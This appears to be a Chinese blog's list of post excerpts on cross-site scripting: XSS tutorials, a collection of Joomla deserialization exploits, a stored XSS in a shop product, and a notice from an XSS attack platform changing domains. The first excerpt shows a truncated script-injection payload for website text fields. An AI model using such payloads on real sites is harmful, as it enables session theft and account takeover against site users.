webxss系列教程2:xss用法案例

1.常用方法简介 我们常常在网站文本框(TEXT)中插入以下代码: '"> 或者是'">(unescape(/var%20b%3Ddocument.createElement%28%22sc...

webxss教程系列1:xss简单介绍

1.简介 跨站脚本攻击(Cross Site Scripting),为不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为X...

joomla 反序列化漏洞 EXP(数种最近关于这个漏洞的exp)

form:暗月 joomla 反序列化漏洞 EXP(各种小程序) 第一个是原版: ''' Simple PoC for Joomla Object In...

海盗云商储存型xss

/** * xss过滤函数 * * @param $string * @return string */ function remove_xss($string) { $string = preg_repla...

Ricky.D. XSS平台更换域名!

本XSS平台已经运行了一年多,积攒了数千名用户,在2016年,本平台决定更换域名,启用顶级域名WEBXSS.TOP!而本平台从未偷窥过用户成果!特地在此声明!  Ricky.D. 2016.1.28 21:...